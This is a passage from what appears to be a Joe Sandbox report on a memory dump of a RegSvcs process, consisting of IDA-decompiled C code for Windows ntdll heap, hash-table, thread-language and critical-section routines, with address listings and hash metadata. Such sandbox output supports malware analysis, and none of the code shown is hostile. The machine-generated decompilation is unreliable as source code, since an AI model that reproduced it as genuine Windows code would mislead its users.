                                          						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
                                          						E012FB150();
                                          						__eflags =  *0x13e7bc8;
                                          						if(__eflags == 0) {
                                          							E013B2073(_t27, 1, _t39, __eflags);
                                          						}
                                          					}
                                          				}
                                          				_t38 =  *(_t39 + 0xb8);
                                          				if(_t38 != 0) {
                                          					_t13 = _t40 >> 0xc;
                                          					__eflags = _t13;
                                          					while(1) {
                                          						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
                                          						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
                                          							break;
                                          						}
                                          						_t30 =  *_t38;
                                          						__eflags = _t30;
                                          						if(_t30 != 0) {
                                          							_t38 = _t30;
                                          							continue;
                                          						}
                                          						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
                                          						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
                                          						break;
                                          					}
                                          					return E0131AB40(_t39, _t38, 0, _t13, _t40);
                                          				} else {
                                          					_t31 = _t39 + 0x8c;
                                          					_t16 =  *_t31;
                                          					while(_t31 != _t16) {
                                          						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
                                          						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
                                          							return _t16;
                                          						}
                                          						_t16 =  *_t16;
                                          					}
                                          					return _t31;
                                          				}
                                          			}















                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-2558761708
                                          • Opcode ID: 2b6b447392a0c104cff84ccdd63e2fc58cb3702a2d3eeb199b940c6ff738b5b4
                                          • Instruction ID: 400f9e64be83269774b7028376ddbec6976e547613001a2836013cfb5eb8da0a
                                          • Opcode Fuzzy Hash: 2b6b447392a0c104cff84ccdd63e2fc58cb3702a2d3eeb199b940c6ff738b5b4
                                          • Instruction Fuzzy Hash: A611D0313246469FDB2DDB19C484B36F7BAEB40A28F15816DE54ACB39DD730D841C751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0138FF60
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                          • API String ID: 3446177414-1911121157
                                          • Opcode ID: 8119eb44691efcf5b2be4089df808a68896f8d1aa67607a7dd1b9b0fe06fe60a
                                          • Instruction ID: 3db4e6f2013745447b339f0fa172d925a083a6a7d65c741eed6a878522cf166e
                                          • Opcode Fuzzy Hash: 8119eb44691efcf5b2be4089df808a68896f8d1aa67607a7dd1b9b0fe06fe60a
                                          • Instruction Fuzzy Hash: A011ED71A10244EFEB22EB58C948F98BBF5BB1870CF148054F6086B2A1C7399958CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E013CDFCE(intOrPtr __ecx, signed int __edx, signed int _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed char _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				intOrPtr _v44;
                                          				intOrPtr _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				unsigned int _t173;
                                          				signed int _t175;
                                          				unsigned int _t177;
                                          				intOrPtr _t178;
                                          				signed int _t201;
                                          				unsigned int _t223;
                                          				unsigned int _t240;
                                          				signed int _t258;
                                          				intOrPtr _t269;
                                          				signed int _t270;
                                          				signed char _t271;
                                          				signed char _t273;
                                          				signed int _t274;
                                          				intOrPtr* _t281;
                                          				signed int* _t284;
                                          				signed char _t292;
                                          				signed int _t293;
                                          				signed char _t300;
                                          				signed char _t305;
                                          				intOrPtr _t314;
                                          				signed int _t315;
                                          				signed int _t319;
                                          				signed int _t323;
                                          				intOrPtr _t326;
                                          				signed char _t328;
                                          				signed int _t334;
                                          				signed char _t335;
                                          				void* _t365;
                                          				signed int _t368;
                                          				signed int* _t373;
                                          				signed int _t377;
                                          				signed int _t378;
                                          				signed int _t381;
                                          				signed int _t382;
                                          				signed int _t383;
                                          				unsigned int _t384;
                                          				void* _t385;
                                          				void* _t386;
                                          				void* _t387;
                                          				void* _t388;
                                          				void* _t389;
                                          				void* _t390;
                                          				signed int _t393;
                                          				signed int _t406;
                                          				signed int _t407;
                                          
                                          				_t367 = __edx;
                                          				_v8 =  *0x13ed360 ^ _t407;
                                          				_t269 = __ecx;
                                          				_v44 = __ecx;
                                          				if(__ecx == 0) {
                                          					L80:
                                          					_t270 = 0;
                                          					L81:
                                          					return E0133B640(_t270, _t270, _v8 ^ _t407, _t367, _t383, _t392);
                                          				}
                                          				_t383 = _a4;
                                          				if(_t383 == 0 || __edx == 0) {
                                          					goto L80;
                                          				} else {
                                          					_v56 = _t383;
                                          					_t393 = 0x4cb2f;
                                          					_t384 = _t383 << 2;
                                          					_v52 = __edx;
                                          					if(_t384 < 8) {
                                          						L7:
                                          						_t385 = _t384 - 1;
                                          						if(_t385 == 0) {
                                          							L20:
                                          							_t392 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
                                          							L21:
                                          							_t15 = _t269 + 0x18; // 0x13e8680
                                          							_v48 = _t15;
                                          							L0131FAD0(_t15);
                                          							_t17 = _t269 + 0xc; // 0x13e8674
                                          							_t367 = _t17;
                                          							_t383 = 0;
                                          							_v20 = _t367;
                                          							_t271 = 0;
                                          							while(1) {
                                          								L22:
                                          								_t19 = _t367 + 4; // 0x0
                                          								_t173 =  *_t19;
                                          								_v12 = _v12 | 0xffffffff;
                                          								_v12 = _v12 << (_t173 & 0x0000001f);
                                          								_t300 = _t392 & _v12;
                                          								_v16 = _t300;
                                          								_v16 = _v16 >> 0x18;
                                          								_v28 = _t300;
                                          								_v28 = _v28 >> 0x10;
                                          								_v24 = _t300;
                                          								_v24 = _v24 >> 8;
                                          								_v32 = _t300;
                                          								if(_t271 != 0) {
                                          									goto L25;
                                          								}
                                          								_t240 = _t173 >> 5;
                                          								_v36 = _t240;
                                          								if(_t240 == 0) {
                                          									_t270 = _t383;
                                          									L34:
                                          									if(_t270 == 0) {
                                          										L38:
                                          										_t272 = _v48;
                                          										E0131FA00(_v48, _t300, _t383, _v48);
                                          										_t367 =  &_v56;
                                          										_t175 = E013CE62A(_v44,  &_v56, _t392);
                                          										_v36 = _t175;
                                          										if(_t175 != 0) {
                                          											E01312280(_t175, _t272);
                                          											_t273 = _t383;
                                          											do {
                                          												_t368 = _v20;
                                          												_v12 = _v12 | 0xffffffff;
                                          												_t177 =  *(_t368 + 4);
                                          												_v12 = _v12 << (_t177 & 0x0000001f);
                                          												_t305 = _v12 & _t392;
                                          												_v24 = _t305;
                                          												_v24 = _v24 >> 0x18;
                                          												_v28 = _t305;
                                          												_v28 = _v28 >> 0x10;
                                          												_v16 = _t305;
                                          												_v16 = _v16 >> 8;
                                          												_v40 = _t305;
                                          												if(_t273 != 0) {
                                          													while(1) {
                                          														L44:
                                          														_t273 =  *_t273;
                                          														if((_t273 & 0x00000001) != 0) {
                                          															break;
                                          														}
                                          														if(_t305 == ( *(_t273 + 4) & _v12)) {
                                          															L48:
                                          															if(_t273 == 0) {
                                          																L55:
                                          																_t178 = _v44;
                                          																_t274 =  *(_t368 + 4);
                                          																_v16 =  *((intOrPtr*)(_t178 + 0x28));
                                          																_v32 =  *(_t178 + 0x20);
                                          																_t181 = _t274 >> 5;
                                          																_v24 =  *((intOrPtr*)(_t178 + 0x24));
                                          																if( *_t368 < (_t274 >> 5) + (_t274 >> 5)) {
                                          																	L76:
                                          																	_t383 = _v36;
                                          																	_t153 = (_t274 >> 5) - 1; // 0xffffffdf
                                          																	_t367 = _t153 & (((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000018) + ((((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000010 & 0x000000ff) + ((((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000008 & 0x000000ff) + (((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4) & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
                                          																	_t281 = _v20;
                                          																	_t314 =  *((intOrPtr*)(_t281 + 8));
                                          																	 *_t383 =  *(_t314 + _t367 * 4);
                                          																	 *(_t314 + _t367 * 4) = _t383;
                                          																	 *_t281 =  *_t281 + 1;
                                          																	E0130FFB0(_t281, _t383, _v48);
                                          																	goto L39;
                                          																}
                                          																_t315 = 2;
                                          																if(E0132F3D5( &_v40, _t181 * _t315, _t181 * _t315 >> 0x20) < 0) {
                                          																	goto L76;
                                          																}
                                          																_t392 = _v40;
                                          																if(_t392 < 4) {
                                          																	_t392 = 4;
                                          																}
                                          																 *0x13eb1e0(_t392 << 2, _v16);
                                          																_t373 =  *_v32();
                                          																_v12 = _t373;
                                          																if(_t373 == 0) {
                                          																	_t274 =  *(_v20 + 4);
                                          																	if(_t274 >= 0x20) {
                                          																		goto L76;
                                          																	}
                                          																	L78:
                                          																	_t270 = _t383;
                                          																	L79:
                                          																	E0130FFB0(_t270, _t383, _v48);
                                          																	_t367 = _v36;
                                          																	E013CE5B6(_v44, _v36);
                                          																	goto L81;
                                          																} else {
                                          																	_t107 = _t392 - 1; // 0x3
                                          																	_t319 = _t107;
                                          																	if((_t392 & _t319) == 0) {
                                          																		L64:
                                          																		if(_t392 > 0x4000000) {
                                          																			_t392 = 0x4000000;
                                          																		}
                                          																		_t284 = _t373;
                                          																		_t201 = _v20 | 0x00000001;
                                          																		asm("sbb ecx, ecx");
                                          																		_t323 =  !(_v12 + (_t392 << 2)) & _t392 << 0x00000002 >> 0x00000002;
                                          																		if(_t323 <= 0) {
                                          																			L69:
                                          																			_t377 = _v20;
                                          																			_v40 = (_t201 | 0xffffffff) << ( *(_t377 + 4) & 0x0000001f);
                                          																			if(( *(_t377 + 4) & 0xffffffe0) <= 0) {
                                          																				L74:
                                          																				_t326 =  *((intOrPtr*)(_t377 + 8));
                                          																				_t274 =  *(_t377 + 4) & 0x0000001f | _t392 << 0x00000005;
                                          																				 *((intOrPtr*)(_t377 + 8)) = _v12;
                                          																				 *(_t377 + 4) = _t274;
                                          																				if(_t326 != 0) {
                                          																					 *0x13eb1e0(_t326, _v16);
                                          																					 *_v24();
                                          																					_t274 =  *(_v20 + 4);
                                          																				}
                                          																				goto L76;
                                          																			} else {
                                          																				goto L70;
                                          																			}
                                          																			do {
                                          																				L70:
                                          																				_t378 =  *((intOrPtr*)(_t377 + 8));
                                          																				_v28 = _t378;
                                          																				while(1) {
                                          																					_t328 =  *(_t378 + _t383 * 4);
                                          																					_v32 = _t328;
                                          																					if((_t328 & 0x00000001) != 0) {
                                          																						goto L73;
                                          																					}
                                          																					 *(_t378 + _t383 * 4) =  *_t328;
                                          																					_t381 = _v12;
                                          																					_t132 = _t392 - 1; // -1
                                          																					_t334 = _t132 & (( *(_t328 + 4) & _v40) >> 0x00000018) + ((( *(_t328 + 4) & _v40) >> 0x00000010 & 0x000000ff) + ((( *(_t328 + 4) & _v40) >> 0x00000008 & 0x000000ff) + (( *(_t328 + 4) & _v40 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
                                          																					_t292 = _v32;
                                          																					 *_t292 =  *(_t381 + _t334 * 4);
                                          																					 *(_t381 + _t334 * 4) = _t292;
                                          																					_t378 = _v28;
                                          																				}
                                          																				L73:
                                          																				_t377 = _v20;
                                          																				_t383 = _t383 + 1;
                                          																			} while (_t383 <  *(_t377 + 4) >> 5);
                                          																			goto L74;
                                          																		} else {
                                          																			_t382 = _t383;
                                          																			do {
                                          																				_t382 = _t382 + 1;
                                          																				 *_t284 = _t201;
                                          																				_t284 =  &(_t284[1]);
                                          																			} while (_t382 < _t323);
                                          																			goto L69;
                                          																		}
                                          																	}
                                          																	_t335 = _t319 | 0xffffffff;
                                          																	if(_t392 == 0) {
                                          																		L63:
                                          																		_t392 = 1 << _t335;
                                          																		goto L64;
                                          																	} else {
                                          																		goto L62;
                                          																	}
                                          																	do {
                                          																		L62:
                                          																		_t335 = _t335 + 1;
                                          																		_t392 = _t392 >> 1;
                                          																	} while (_t392 != 0);
                                          																	goto L63;
                                          																}
                                          															}
                                          															goto L49;
                                          														}
                                          													}
                                          													_t273 = _t383;
                                          													goto L48;
                                          												}
                                          												_t223 = _t177 >> 5;
                                          												_v32 = _t223;
                                          												if(_t223 == 0) {
                                          													_t273 = _t383;
                                          													L51:
                                          													if(_t273 == 0) {
                                          														goto L55;
                                          													}
                                          													_t88 = _t273 + 8; // 0x8
                                          													if(E013CE7A8(_t88) != 0) {
                                          														goto L79;
                                          													}
                                          													goto L78;
                                          												}
                                          												_t273 =  *((intOrPtr*)(_t368 + 8)) + (_v32 - 0x00000001 & (_v24 & 0x000000ff) + 0x164b2f3f + (((_t305 & 0x000000ff) * 0x00000025 + (_v16 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
                                          												_t305 = _v40;
                                          												goto L44;
                                          												L49:
                                          											} while (E013CEE71(_t273,  &_v56) == 0);
                                          											_t368 = _v20;
                                          											goto L51;
                                          										}
                                          										L39:
                                          										_t270 = _t383;
                                          										goto L81;
                                          									}
                                          									_t50 = _t270 + 8; // 0x8
                                          									_t345 = _t50;
                                          									if(E013CE7A8(_t50) == 0) {
                                          										_t270 = _t383;
                                          									}
                                          									E0131FA00(_t270, _t345, _t383, _v48);
                                          									goto L81;
                                          								}
                                          								_t40 = _t367 + 8; // 0x0
                                          								_t271 =  *_t40 + (_v36 - 0x00000001 & (_v16 & 0x000000ff) + 0x164b2f3f + (((_t300 & 0x000000ff) * 0x00000025 + (_v24 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
                                          								_t300 = _v32;
                                          								L25:
                                          								_t367 = _v12;
                                          								while(1) {
                                          									_t271 =  *_t271;
                                          									if((_t271 & 0x00000001) != 0) {
                                          										break;
                                          									}
                                          									if(_t300 == ( *(_t271 + 4) & _t367)) {
                                          										L30:
                                          										if(_t270 == 0) {
                                          											goto L38;
                                          										}
                                          										if(E013CEE71(_t270,  &_v56) != 0) {
                                          											goto L34;
                                          										}
                                          										_t367 = _v20;
                                          										goto L22;
                                          									}
                                          								}
                                          								_t270 = _t383;
                                          								goto L30;
                                          							}
                                          						}
                                          						_t386 = _t385 - 1;
                                          						if(_t386 == 0) {
                                          							L19:
                                          							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
                                          							_t367 = _t367 + 1;
                                          							goto L20;
                                          						}
                                          						_t387 = _t386 - 1;
                                          						if(_t387 == 0) {
                                          							L18:
                                          							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
                                          							_t367 = _t367 + 1;
                                          							goto L19;
                                          						}
                                          						_t388 = _t387 - 1;
                                          						if(_t388 == 0) {
                                          							L17:
                                          							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
                                          							_t367 = _t367 + 1;
                                          							goto L18;
                                          						}
                                          						_t389 = _t388 - 1;
                                          						if(_t389 == 0) {
                                          							L16:
                                          							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
                                          							_t367 = _t367 + 1;
                                          							goto L17;
                                          						}
                                          						_t390 = _t389 - 1;
                                          						if(_t390 == 0) {
                                          							L15:
                                          							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
                                          							_t367 = _t367 + 1;
                                          							goto L16;
                                          						}
                                          						if(_t390 != 1) {
                                          							goto L21;
                                          						}
                                          						_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
                                          						_t367 = _t367 + 1;
                                          						goto L15;
                                          					}
                                          					_t258 = _t384 >> 3;
                                          					_v36 = _t258;
                                          					_t293 = _t258;
                                          					_t384 = _t384 + _t258 * 0xfffffff8;
                                          					do {
                                          						_t365 = (((((( *(_t367 + 1) & 0x000000ff) * 0x25 + ( *(_t367 + 2) & 0x000000ff)) * 0x25 + ( *(_t367 + 3) & 0x000000ff)) * 0x25 + ( *(_t367 + 4) & 0x000000ff)) * 0x25 + ( *(_t367 + 5) & 0x000000ff)) * 0x25 + ( *(_t367 + 6) & 0x000000ff)) * 0x25 + ( *_t367 & 0x000000ff) * 0x1a617d0d;
                                          						_t406 =  *(_t367 + 7) & 0x000000ff;
                                          						_t367 = _t367 + 8;
                                          						_t393 = _t406 + _t365 - _t393 * 0x2fe8ed1f;
                                          						_t293 = _t293 - 1;
                                          					} while (_t293 != 0);
                                          					_t269 = _v44;
                                          					goto L7;
                                          				}
                                          			}
































































                                          0x013ce255
                                          0x00000000
                                          0x013ce271
                                          0x013ce27b
                                          0x013ce283
                                          0x00000000
                                          0x013ce283
                                          0x013ce1d4
                                          0x013ce1d4
                                          0x00000000
                                          0x013ce1d4
                                          0x013ce19d
                                          0x013ce19d
                                          0x013ce1a7
                                          0x013ce1a9
                                          0x013ce1a9
                                          0x013ce1ae
                                          0x00000000
                                          0x013ce1ae
                                          0x013ce15d
                                          0x013ce160
                                          0x013ce163
                                          0x013ce166
                                          0x013ce166
                                          0x013ce169
                                          0x013ce169
                                          0x013ce16e
                                          0x00000000
                                          0x00000000
                                          0x013ce177
                                          0x013ce17d
                                          0x013ce17f
                                          0x00000000
                                          0x00000000
                                          0x013ce18d
                                          0x00000000
                                          0x00000000
                                          0x013ce18f
                                          0x00000000
                                          0x013ce18f
                                          0x013ce179
                                          0x013ce17b
                                          0x00000000
                                          0x013ce17b
                                          0x013ce0f4
                                          0x013ce082
                                          0x013ce085
                                          0x013ce0cd
                                          0x013ce0d3
                                          0x013ce0d5
                                          0x00000000
                                          0x013ce0d5
                                          0x013ce087
                                          0x013ce08a
                                          0x013ce0c4
                                          0x013ce0ca
                                          0x013ce0cc
                                          0x00000000
                                          0x013ce0cc
                                          0x013ce08c
                                          0x013ce08f
                                          0x013ce0bb
                                          0x013ce0c1
                                          0x013ce0c3
                                          0x00000000
                                          0x013ce0c3
                                          0x013ce091
                                          0x013ce094
                                          0x013ce0b2
                                          0x013ce0b8
                                          0x013ce0ba
                                          0x00000000
                                          0x013ce0ba
                                          0x013ce096
                                          0x013ce099
                                          0x013ce0a9
                                          0x013ce0af
                                          0x013ce0b1
                                          0x00000000
                                          0x013ce0b1
                                          0x013ce09e
                                          0x00000000
                                          0x00000000
                                          0x013ce0a6
                                          0x013ce0a8
                                          0x00000000
                                          0x013ce0a8
                                          0x013ce018
                                          0x013ce01b
                                          0x013ce01e
                                          0x013ce023
                                          0x013ce025
                                          0x013ce062
                                          0x013ce06a
                                          0x013ce06e
                                          0x013ce073
                                          0x013ce075
                                          0x013ce075
                                          0x013ce07a
                                          0x00000000
                                          0x013ce07a

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: be1e20e080cd40a0aa791de163e01aec7478dd3cdb29345e4f4a9c3a75f74e6d
                                          • Instruction ID: 08f3ddb8c41a134f6404af3f3d4934a6470b993ec1f8d6c8c7668a27b3e7e172
                                          • Opcode Fuzzy Hash: be1e20e080cd40a0aa791de163e01aec7478dd3cdb29345e4f4a9c3a75f74e6d
                                          • Instruction Fuzzy Hash: 75F1B172E0022A8BDB18DEA9C9D15BDFFF5EB48604B09827DD916EB381D634DD40CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 80%
                                          			E0132FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                          				char _v5;
                                          				signed int _v8;
                                          				signed int _v12;
                                          				char _v16;
                                          				char _v17;
                                          				char _v20;
                                          				signed int _v24;
                                          				char _v28;
                                          				char _v32;
                                          				signed int _v40;
                                          				void* __ecx;
                                          				void* __edi;
                                          				void* __ebp;
                                          				signed int _t73;
                                          				intOrPtr* _t75;
                                          				signed int _t77;
                                          				signed int _t79;
                                          				signed int _t81;
                                          				intOrPtr _t83;
                                          				intOrPtr _t85;
                                          				intOrPtr _t86;
                                          				signed int _t91;
                                          				signed int _t94;
                                          				signed int _t95;
                                          				signed int _t96;
                                          				signed int _t106;
                                          				signed int _t108;
                                          				signed int _t114;
                                          				signed int _t116;
                                          				signed int _t118;
                                          				signed int _t122;
                                          				signed int _t123;
                                          				void* _t129;
                                          				signed int _t130;
                                          				void* _t132;
                                          				intOrPtr* _t134;
                                          				signed int _t138;
                                          				signed int _t141;
                                          				signed int _t147;
                                          				intOrPtr _t153;
                                          				signed int _t154;
                                          				signed int _t155;
                                          				signed int _t170;
                                          				void* _t174;
                                          				signed int _t176;
                                          				signed int _t177;
                                          
                                          				_t129 = __ebx;
                                          				_push(_t132);
                                          				_push(__esi);
                                          				_t174 = _t132;
                                          				_t73 =  !( *( *(_t174 + 0x18)));
                                          				if(_t73 >= 0) {
                                          					L5:
                                          					return _t73;
                                          				} else {
                                          					E0130EEF0(0x13e7b60);
                                          					_t134 =  *0x13e7b84; // 0x77e47b80
                                          					_t2 = _t174 + 0x24; // 0x24
                                          					_t75 = _t2;
                                          					if( *_t134 != 0x13e7b80) {
                                          						_push(3);
                                          						asm("int 0x29");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						_push(0x13e7b60);
                                          						_t170 = _v8;
                                          						_v28 = 0;
                                          						_v40 = 0;
                                          						_v24 = 0;
                                          						_v17 = 0;
                                          						_v32 = 0;
                                          						__eflags = _t170 & 0xffff7cf2;
                                          						if((_t170 & 0xffff7cf2) != 0) {
                                          							L43:
                                          							_t77 = 0xc000000d;
                                          						} else {
                                          							_t79 = _t170 & 0x0000000c;
                                          							__eflags = _t79;
                                          							if(_t79 != 0) {
                                          								__eflags = _t79 - 0xc;
                                          								if(_t79 == 0xc) {
                                          									goto L43;
                                          								} else {
                                          									goto L9;
                                          								}
                                          							} else {
                                          								_t170 = _t170 | 0x00000008;
                                          								__eflags = _t170;
                                          								L9:
                                          								_t81 = _t170 & 0x00000300;
                                          								__eflags = _t81 - 0x300;
                                          								if(_t81 == 0x300) {
                                          									goto L43;
                                          								} else {
                                          									_t138 = _t170 & 0x00000001;
                                          									__eflags = _t138;
                                          									_v24 = _t138;
                                          									if(_t138 != 0) {
                                          										__eflags = _t81;
                                          										if(_t81 != 0) {
                                          											goto L43;
                                          										} else {
                                          											goto L11;
                                          										}
                                          									} else {
                                          										L11:
                                          										_push(_t129);
                                          										_t77 = E01306D90( &_v20);
                                          										_t130 = _t77;
                                          										__eflags = _t130;
                                          										if(_t130 >= 0) {
                                          											_push(_t174);
                                          											__eflags = _t170 & 0x00000301;
                                          											if((_t170 & 0x00000301) == 0) {
                                          												_t176 = _a8;
                                          												__eflags = _t176;
                                          												if(__eflags == 0) {
                                          													L64:
                                          													_t83 =  *[fs:0x18];
                                          													_t177 = 0;
                                          													__eflags =  *(_t83 + 0xfb8);
                                          													if( *(_t83 + 0xfb8) != 0) {
                                          														E013076E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                          														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                          													}
                                          													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                          													goto L15;
                                          												} else {
                                          													asm("sbb edx, edx");
                                          													_t114 = E01398938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                          													__eflags = _t114;
                                          													if(_t114 < 0) {
                                          														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                          														E012FB150();
                                          													}
                                          													_t116 = E01396D81(_t176,  &_v16);
                                          													__eflags = _t116;
                                          													if(_t116 >= 0) {
                                          														__eflags = _v16 - 2;
                                          														if(_v16 < 2) {
                                          															L56:
                                          															_t118 = E013075CE(_v20, 5, 0);
                                          															__eflags = _t118;
                                          															if(_t118 < 0) {
                                          																L67:
                                          																_t130 = 0xc0000017;
                                          																goto L32;
                                          															} else {
                                          																__eflags = _v12;
                                          																if(_v12 == 0) {
                                          																	goto L67;
                                          																} else {
                                          																	_t153 =  *0x13e8638; // 0x0
                                          																	_t122 = L013038A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                          																	_t154 = _v12;
                                          																	_t130 = _t122;
                                          																	__eflags = _t130;
                                          																	if(_t130 >= 0) {
                                          																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                          																		__eflags = _t123;
                                          																		if(_t123 != 0) {
                                          																			_t155 = _a12;
                                          																			__eflags = _t155;
                                          																			if(_t155 != 0) {
                                          																				 *_t155 = _t123;
                                          																			}
                                          																			goto L64;
                                          																		} else {
                                          																			E013076E2(_t154);
                                          																			goto L41;
                                          																		}
                                          																	} else {
                                          																		E013076E2(_t154);
                                          																		_t177 = 0;
                                          																		goto L18;
                                          																	}
                                          																}
                                          															}
                                          														} else {
                                          															__eflags =  *_t176;
                                          															if( *_t176 != 0) {
                                          																goto L56;
                                          															} else {
                                          																__eflags =  *(_t176 + 2);
                                          																if( *(_t176 + 2) == 0) {
                                          																	goto L64;
                                          																} else {
                                          																	goto L56;
                                          																}
                                          															}
                                          														}
                                          													} else {
                                          														_t130 = 0xc000000d;
                                          														goto L32;
                                          													}
                                          												}
                                          												goto L35;
                                          											} else {
                                          												__eflags = _a8;
                                          												if(_a8 != 0) {
                                          													_t77 = 0xc000000d;
                                          												} else {
                                          													_v5 = 1;
                                          													L0132FCE3(_v20, _t170);
                                          													_t177 = 0;
                                          													__eflags = 0;
                                          													L15:
                                          													_t85 =  *[fs:0x18];
                                          													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                          													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                          														L18:
                                          														__eflags = _t130;
                                          														if(_t130 != 0) {
                                          															goto L32;
                                          														} else {
                                          															__eflags = _v5 - _t130;
                                          															if(_v5 == _t130) {
                                          																goto L32;
                                          															} else {
                                          																_t86 =  *[fs:0x18];
                                          																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                          																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                          																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                          																}
                                          																__eflags = _t177;
                                          																if(_t177 == 0) {
                                          																	L31:
                                          																	__eflags = 0;
                                          																	L013070F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                          																	goto L32;
                                          																} else {
                                          																	__eflags = _v24;
                                          																	_t91 =  *(_t177 + 0x20);
                                          																	if(_v24 != 0) {
                                          																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                          																		goto L31;
                                          																	} else {
                                          																		_t141 = _t91 & 0x00000040;
                                          																		__eflags = _t170 & 0x00000100;
                                          																		if((_t170 & 0x00000100) == 0) {
                                          																			__eflags = _t141;
                                          																			if(_t141 == 0) {
                                          																				L74:
                                          																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                          																				goto L27;
                                          																			} else {
                                          																				_t177 = E0132FD22(_t177);
                                          																				__eflags = _t177;
                                          																				if(_t177 == 0) {
                                          																					goto L42;
                                          																				} else {
                                          																					_t130 = E0132FD9B(_t177, 0, 4);
                                          																					__eflags = _t130;
                                          																					if(_t130 != 0) {
                                          																						goto L42;
                                          																					} else {
                                          																						_t68 = _t177 + 0x20;
                                          																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                          																						__eflags =  *_t68;
                                          																						_t91 =  *(_t177 + 0x20);
                                          																						goto L74;
                                          																					}
                                          																				}
                                          																			}
                                          																			goto L35;
                                          																		} else {
                                          																			__eflags = _t141;
                                          																			if(_t141 != 0) {
